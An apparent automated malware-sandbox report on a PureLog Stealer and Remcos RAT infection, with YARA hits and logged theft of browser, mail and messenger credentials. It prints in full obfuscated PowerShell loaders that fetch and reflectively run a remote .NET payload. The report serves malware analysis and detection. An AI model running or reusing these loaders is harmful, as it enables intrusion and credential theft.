                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrwu0hpbuvbnf0rjfbtse9nrvsznf0rj1gnksggkcdicvj1cicrj2wgjysnpsankydwvuynkydodccrj3qnkydwczovl2knkydhnicrjzawmtawlnvzlmfyy2hpdmuub3inkydnlycrjzi0l2l0jysnzw1zl2qnkydljysndgenkydolw5vjysndccrj2utdi9ezscrj3qnkydhae5vdgunkydwlnr4dfzvjysnricrjzticvjiyscrj3nlnjqnkyddjysnb250zw50id0gke5ldycrjy1pympljysny3qnkycgu3lzjysndgvtjysnlk4nkydljysndc5xzscrj2inkyddjysnbgknkydljysnbnqnkycpjysnlkrvd25sjysnbycrj2fkuycrj3ryascrj25nkehxunvybck7shfsymknkyduyxj5q29udgvudca9ifttjysnexn0zw0uqycrj28nkydujysndmvydf06okzyb21cyxmnkydlnjrtdhjpjysnbmcoshfsymfzzscrjzy0qycrj29udccrj2vudck7shfsjysnyxmnkydzzw1ibhknkycgpsbbuicrj2vmbgvjdglvbi5bcycrj3nlbscrj2jsev06okxvywqosccrj3fsyicrj2luyxinkyd5qycrj29ujysndccrj2vudck7jysnshenkydsdhlwzsa9jysniccrj0gnkydxumfzc2unkydtymx5lkdldfr5cguovicrj1vgunvujysnuccrj0uujysnsg9tzvzvricrjyk7sccrj3fsjysnbwv0jysnag9kid0gshfsdccrj3lwzs5hzxrnzxqnkydob2qojysnvlvgvkenkydjvlvgktticvjtzxqnkydob2qusw52b2tlkehxuicrj251bgwnkycsiftvymply3rbxv1akfzvjysnrnr4dc4nkydwqkdslycrjza1jysnns8yjysnnscrjy4wms45mi41occrjzevlzonkydwdhrovlvgicwgjysnvlvgzccrj2vzyscrj3qnkydpdicrj2fkjysnb1zvriankycsjysnifzvjysnrmqnkydlc2f0ascrj3ynkydhzccrj29wjysnvuynkycgjysnlccrjybwjysnvuzkzscrj3mnkydhdgknkyd2ywrvvlvglccrj1zvrljljysnz0fzbvynkydvrixwvuzwjysnvuypkscplljlcgxhy2uokftjsefyxtcyk1tjsefyxtexmytby0hbcl04miksw1n0ukluz11by0hbcl0znikuumvwbgfjzsgow2niqxjdodyrw2niqxjdodurw2niqxjdnzaplfttdfjjbmddw2niqxjdmzkpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $pshome[4]+$pshome[34]+'x')( ('hqrur'+'l '+'= '+'vuf'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/de'+'t'+'ahnote'+'v.txtvu'+'f'+';hqrba'+'se64'+'c'+'ontent = (new'+'-obje'+'ct'+' sys'+'tem'+'.n'+'e'+'t.we'+'b'+'c'+'li'+'e'+'nt'+')'+'.downl'+'o'+'ads'+'tri'+'ng(hqrurl);hqrbi'+'narycontent = [s'+'ystem.c'+'o'+'n'+'vert]::frombas'+'e64stri'+'ng(hqrbase'+'64c'+'ont'+'ent);hqr'+'as'+'sembly'+' = [r'+'eflection.as'+'sem'+'bly]::load(h'+'qrb'+'inar'+'yc'+'on'+'t'+'ent);'+'hq'+'rtype ='+' '+'h'+'qrasse'+'mbly.gettype(v'+'ufrun'+'p'+'e.'+'homevuf'+');h'+'qr'+'met'+'hod = hqrt'+'ype.getmet'+'hod('+'vufva'+'ivuf);hqrmet'+'hod.invoke(hqr'+'null'+', [object[]]@(vu'+'ftxt.'+'vbgr/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthvuf , '+'vufd'+'esa'+'t'+'iv'+'ad'+'ovuf '+','+' vu'+'fd'+'esati'+'v'+'ad'+'ov'+'uf'+' '+','+' v'+'ufde'+'s'+'ati'+'vadovuf,'+'vufre'+'gasmv'+'uf,vufv'+'uf))').replace(([char]72+[char]113+[char]82),[string][char]36).replace(([char]86+[char]85+[char]70),[string][char]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrwu0hpbuvbnf0rjfbtse9nrvsznf0rj1gnksggkcdicvj1cicrj2wgjysnpsankydwvuynkydodccrj3qnkydwczovl2knkydhnicrjzawmtawlnvzlmfyy2hpdmuub3inkydnlycrjzi0l2l0jysnzw1zl2qnkydljysndgenkydolw5vjysndccrj2utdi9ezscrj3qnkydhae5vdgunkydwlnr4dfzvjysnricrjzticvjiyscrj3nlnjqnkyddjysnb250zw50id0gke5ldycrjy1pympljysny3qnkycgu3lzjysndgvtjysnlk4nkydljysndc5xzscrj2inkyddjysnbgknkydljysnbnqnkycpjysnlkrvd25sjysnbycrj2fkuycrj3ryascrj25nkehxunvybck7shfsymknkyduyxj5q29udgvudca9ifttjysnexn0zw0uqycrj28nkydujysndmvydf06okzyb21cyxmnkydlnjrtdhjpjysnbmcoshfsymfzzscrjzy0qycrj29udccrj2vudck7shfsjysnyxmnkydzzw1ibhknkycgpsbbuicrj2vmbgvjdglvbi5bcycrj3nlbscrj2jsev06okxvywqosccrj3fsyicrj2luyxinkyd5qycrj29ujysndccrj2vudck7jysnshenkydsdhlwzsa9jysniccrj0gnkydxumfzc2unkydtymx5lkdldfr5cguovicrj1vgunvujysnuccrj0uujysnsg9tzvzvricrjyk7sccrj3fsjysnbwv0jysnag9kid0gshfsdccrj3lwzs5hzxrnzxqnkydob2qojysnvlvgvkenkydjvlvgktticvjtzxqnkydob2qusw52b2tlkehxuicrj251bgwnkycsiftvymply3rbxv1akfzvjysnrnr4dc4nkydwqkdslycrjza1jysnns8yjysnnscrjy4wms45mi41occrjzevlzonkydwdhrovlvgicwgjysnvlvgzccrj2vzyscrj3qnkydpdicrj2fkjysnb1zvriankycsjysnifzvjysnrmqnkydlc2f0ascrj3ynkydhzccrj29wjysnvuynkycgjysnlccrjybwjysnvuzkzscrj3mnkydhdgknkyd2ywrvvlvglccrj1zvrljljysnz0fzbvynkydvrixwvuzwjysnvuypkscplljlcgxhy2uokftjsefyxtcyk1tjsefyxtexmytby0hbcl04miksw1n0ukluz11by0hbcl0znikuumvwbgfjzsgow2niqxjdodyrw2niqxjdodurw2niqxjdnzaplfttdfjjbmddw2niqxjdmzkpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $pshome[4]+$pshome[34]+'x')( ('hqrur'+'l '+'= '+'vuf'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/de'+'t'+'ahnote'+'v.txtvu'+'f'+';hqrba'+'se64'+'c'+'ontent = (new'+'-obje'+'ct'+' sys'+'tem'+'.n'+'e'+'t.we'+'b'+'c'+'li'+'e'+'nt'+')'+'.downl'+'o'+'ads'+'tri'+'ng(hqrurl);hqrbi'+'narycontent = [s'+'ystem.c'+'o'+'n'+'vert]::frombas'+'e64stri'+'ng(hqrbase'+'64c'+'ont'+'ent);hqr'+'as'+'sembly'+' = [r'+'eflection.as'+'sem'+'bly]::load(h'+'qrb'+'inar'+'yc'+'on'+'t'+'ent);'+'hq'+'rtype ='+' '+'h'+'qrasse'+'mbly.gettype(v'+'ufrun'+'p'+'e.'+'homevuf'+');h'+'qr'+'met'+'hod = hqrt'+'ype.getmet'+'hod('+'vufva'+'ivuf);hqrmet'+'hod.invoke(hqr'+'null'+', [object[]]@(vu'+'ftxt.'+'vbgr/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthvuf , '+'vufd'+'esa'+'t'+'iv'+'ad'+'ovuf '+','+' vu'+'fd'+'esati'+'v'+'ad'+'ov'+'uf'+' '+','+' v'+'ufde'+'s'+'ati'+'vadovuf,'+'vufre'+'gasmv'+'uf,vufv'+'uf))').replace(([char]72+[char]113+[char]82),[string][char]36).replace(([char]86+[char]85+[char]70),[string][char]39) )"Jump to behavior
                  Source: RegAsm.exe, 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434CB6 cpuid 9_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv,9_2_0041B890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B69E GetComputerNameExW,GetUserNameW,9_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 8.2.powershell.exe.439db68.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.439db68.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB6B
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
